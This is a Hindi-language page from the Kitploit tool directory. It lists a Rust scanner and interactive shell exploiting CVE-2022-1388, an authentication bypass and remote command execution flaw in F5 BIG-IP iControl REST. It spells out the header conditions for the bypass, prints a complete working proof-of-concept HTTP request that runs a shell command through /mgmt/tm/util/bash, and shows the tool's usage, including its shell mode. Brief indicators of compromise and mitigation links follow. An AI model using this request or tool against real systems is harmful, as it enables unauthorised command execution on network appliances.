Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST प्रमाणीकरण बायपास RCE Rust में लिखा गया | Kitploit
उपकरण/GitHubGitHub/aancw/cve-2022-1388-rs
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST प्रमाणीकरण बायपास RCE Rust में लिखा गया

रिपॉजिटरी देखें
254 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE के लिए स्कैनर और इंटरैक्टिव शेल, जो Rust में लिखा गया है

सारांश

सब कुछ समेटने के लिए, इस भेद्यता का शोषण करने वाले अनुरोध के लिए आवश्यक शर्तों का अवलोकन यहाँ है:

  • Connection हेडर में X-F5-Auth-Token शामिल होना चाहिए
  • X-F5-Auth-Token हेडर मौजूद होना चाहिए
  • Host हेडर localhost / 127.0.0.1 होना चाहिए, या Connection हेडर में X-Forwarded-Host शामिल होना चाहिए
  • admin उपयोगकर्ता नाम और किसी भी पासवर्ड के साथ Auth हेडर सेट होना चाहिए

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

लैब सेटअप

  • आप लैब पा सकते हैं यहाँ

उपयोग

root@kitploit:~
$ cve_2022_1308_rs -h

CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust

USAGE:
    cve_2022_1388_rs [OPTIONS] --url <URL>

OPTIONS:
    -h, --help         Print help information
    -s, --shell        This mode for accessing payload with interactive shell
    -u, --url <URL>    F5 Big-IP target url
    -V, --version      Print version information

आवश्यकताएँ

  • Rust
  • Cargo

IoCs

IOCs को /var/log/audit लॉग फ़ाइल में पाया जा सकता है। mgmt/tm/util/bash एंडपॉइंट द्वारा निष्पादित अज्ञात कमांड चिंता का कारण होनी चाहिए।

शमन

नवीनतम संस्करण में अपडेट करें या F5 सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें

  • https://support.f5.com/csp/article/K23605346

संदर्भ

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
टूल डाउनलोड करें